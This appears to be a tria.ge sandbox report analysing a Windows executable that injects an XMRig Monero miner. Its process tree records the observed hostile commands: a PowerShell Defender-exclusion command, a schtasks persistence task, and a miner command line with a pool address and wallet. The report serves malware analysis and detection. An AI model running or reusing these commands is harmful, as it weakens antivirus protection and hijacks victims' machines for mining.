Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
90s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
02/02/2023, 09:18
Static task
static1
General
-
Target
ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe
-
Size
3.4MB
-
MD5
2e650376cd95f186c48b3c2a55e73129
-
SHA1
db0dd8ab08d23e64d4ade4c0f9e900252fcaa4d7
-
SHA256
ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0
-
SHA512
ef241f8bdff2bd9d2bf7c2c86e715fcdcda0bad3578bbaffd540c916394e1b33f1cf6664001dd687adefb51fae4fe70a384b5d2291777fc5038a98fbded74265
-
SSDEEP
98304:/dHXuzq3zvG40UcGwOI54HPXVk79/Cyf31DA0R:F3uzczaUx/I54H/0/
Malware Config
Signatures
-
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/2220-143-0x0000000000510000-0x000000000095A000-memory.dmp net_reactor -
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/4392-160-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4392-161-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/4392-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4392-163-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4392-165-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/4392-167-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2220 set thread context of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4752 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 4280 powershell.exe 4280 powershell.exe 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 660 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe Token: SeDebugPrivilege 4280 powershell.exe Token: SeLockMemoryPrivilege 4392 vbc.exe Token: SeLockMemoryPrivilege 4392 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4392 vbc.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2220 wrote to memory of 4280 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 80 PID 2220 wrote to memory of 4280 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 80 PID 2220 wrote to memory of 1140 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 88 PID 2220 wrote to memory of 1140 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 88 PID 1140 wrote to memory of 4752 1140 cmd.exe 90 PID 1140 wrote to memory of 4752 1140 cmd.exe 90 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92 PID 2220 wrote to memory of 4392 2220 ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe"C:\Users\Admin\AppData\Local\Temp\ad8302cc27bcb2b8701aa1cce10c6b08ebef18aee1c77853e6d76a90558957f0.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "SRIKA" /tr "C:\ProgramData\versionApp\SRIKA.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "SRIKA" /tr "C:\ProgramData\versionApp\SRIKA.exe"3⤵
- Creates scheduled task(s)
PID:4752
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4392
-